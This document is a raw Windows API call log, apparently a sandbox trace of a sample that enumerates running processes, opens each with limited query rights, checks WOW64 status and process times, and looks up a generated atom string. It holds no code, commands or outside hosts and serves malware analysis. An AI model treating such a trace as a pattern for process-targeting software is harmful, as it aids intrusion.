	[0074.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0074.292] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.292] CloseHandle (hObject=0x224) returned 1
	[0074.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x7288b8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0074.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0074.292] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.292] CloseHandle (hObject=0x224) returned 1
	[0074.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0074.292] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.292] CloseHandle (hObject=0x224) returned 1
	[0074.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0074.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0074.292] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.293] CloseHandle (hObject=0x224) returned 1
	[0074.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0074.293] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.293] CloseHandle (hObject=0x224) returned 1
	[0074.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0074.293] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.293] CloseHandle (hObject=0x224) returned 1
	[0074.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7288b8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0074.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0074.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0074.293] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.293] CloseHandle (hObject=0x224) returned 1
	[0074.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x728958, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0074.294] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.294] CloseHandle (hObject=0x224) returned 1
	[0074.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dcb0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0074.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0074.294] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.294] CloseHandle (hObject=0x224) returned 1
	[0074.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x7287f8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0074.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0074.294] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.294] CloseHandle (hObject=0x224) returned 1
	[0074.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72ea18, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0074.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0074.294] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.294] CloseHandle (hObject=0x224) returned 1
	[0074.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0074.294] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.294] CloseHandle (hObject=0x224) returned 1
	[0074.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0074.295] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.295] CloseHandle (hObject=0x224) returned 1
	[0074.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0074.295] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.295] CloseHandle (hObject=0x224) returned 1
	[0074.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0074.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0074.295] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.295] CloseHandle (hObject=0x224) returned 1
	[0074.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x728838, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0074.295] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.295] CloseHandle (hObject=0x224) returned 1
	[0074.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0074.295] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.295] CloseHandle (hObject=0x224) returned 1
	[0074.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0074.296] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.296] CloseHandle (hObject=0x224) returned 1
	[0074.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72ea68, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0074.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0074.296] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.296] CloseHandle (hObject=0x224) returned 1
	[0074.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772158, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0074.296] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.296] CloseHandle (hObject=0x224) returned 1
	[0074.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772200, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0074.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0074.296] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.296] CloseHandle (hObject=0x224) returned 1
	[0074.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0074.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0074.296] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.297] CloseHandle (hObject=0x224) returned 1
	[0074.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x7721d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.297] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0074.297] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.297] CloseHandle (hObject=0x224) returned 1
	[0074.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x728818, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0074.297] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0074.297] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.297] CloseHandle (hObject=0x224) returned 1
	[0074.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72e8d8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0074.297] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0074.297] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.297] CloseHandle (hObject=0x224) returned 1
	[0074.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72e810, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0074.297] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0074.297] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.297] CloseHandle (hObject=0x224) returned 1
	[0074.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x772188, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.298] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.298] GetLastError () returned 0x5
	[0074.299] GetLastError () returned 0x5
	[0074.299] GetLastError () returned 0x5
	[0074.299] GetLastError () returned 0x5
	[0074.299] GetLastError () returned 0x5
	[0074.299] GetLastError () returned 0x5
	[0074.299] GetLastError () returned 0x5
	[0074.299] GetLastError () returned 0x5
	[0074.299] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.299] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0074.299] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0074.299] GetLastError () returned 0x5
	[0074.299] GetLastError () returned 0x5
	[0074.299] GetLastError () returned 0x5
	[0074.299] GetLastError () returned 0x5
	[0074.299] GetLastError () returned 0x5
	[0074.299] GetLastError () returned 0x5
	[0074.299] GetLastError () returned 0x5
	[0074.299] GetLastError () returned 0x5
	[0074.299] GetLastError () returned 0x5
	[0074.299] GetLastError () returned 0x5
	[0074.299] GetLastError () returned 0x5
	[0074.299] GetLastError () returned 0x5
	[0074.299] GetLastError () returned 0x5
	[0074.299] GetLastError () returned 0x5
	[0074.299] GetLastError () returned 0x5
	[0074.299] GetLastError () returned 0x5
	[0074.299] GetLastError () returned 0x5
	[0074.299] GetLastError () returned 0x5
	[0074.299] GetLastError () returned 0x5
	[0074.299] GetLastError () returned 0x5
	[0074.299] GetLastError () returned 0x5
	[0074.299] GetLastError () returned 0x5
	[0074.299] GetLastError () returned 0x5
	[0074.299] GetLastError () returned 0x5
	[0074.299] GetLastError () returned 0x5
	[0074.299] GetLastError () returned 0x5
	[0074.299] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0074.299] GetLastError () returned 0x5
	[0074.299] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.300] GetLastError () returned 0x5
	[0074.301] GetLastError () returned 0x5
	[0074.301] GetLastError () returned 0x5
	[0074.301] GetLastError () returned 0x5
	[0074.301] GetLastError () returned 0x5
	[0074.301] GetLastError () returned 0x5
	[0074.301] GetLastError () returned 0x5
	[0074.301] GetLastError () returned 0x5
	[0074.301] GetLastError () returned 0x5
	[0074.301] GetLastError () returned 0x5
	[0074.301] GetLastError () returned 0x5
	[0074.301] GetLastError () returned 0x5
	[0074.301] GetLastError () returned 0x5
	[0074.301] GetLastError () returned 0x5
	[0074.301] GetLastError () returned 0x5
	[0074.301] GetLastError () returned 0x5
	[0074.301] GetLastError () returned 0x5
	[0074.301] GetLastError () returned 0x5
	[0074.301] GetLastError () returned 0x5
	[0074.301] GetLastError () returned 0x5
	[0074.301] GetLastError () returned 0x5
	[0074.301] GetLastError () returned 0x5
	[0074.301] GetLastError () returned 0x5
	[0074.301] GetLastError () returned 0x5
	[0074.301] GetLastError () returned 0x5
	[0074.301] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.301] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0074.301] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.301] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0074.301] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0074.301] CloseHandle (hObject=0x224) returned 1
	[0074.301] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0074.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.302] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0074.302] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.302] CloseHandle (hObject=0x224) returned 1
	[0074.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72ea18, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0074.302] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0074.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.302] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0074.302] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.302] CloseHandle (hObject=0x224) returned 1
	[0074.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772200, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0074.338] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16e08) returned 0xc0000004
	[0074.338] VirtualAlloc (lpAddress=0x0, dwSize=0x16f08, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0074.339] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16f08, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0074.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0074.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772218, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0074.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0074.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772218, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0074.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0074.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772188, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
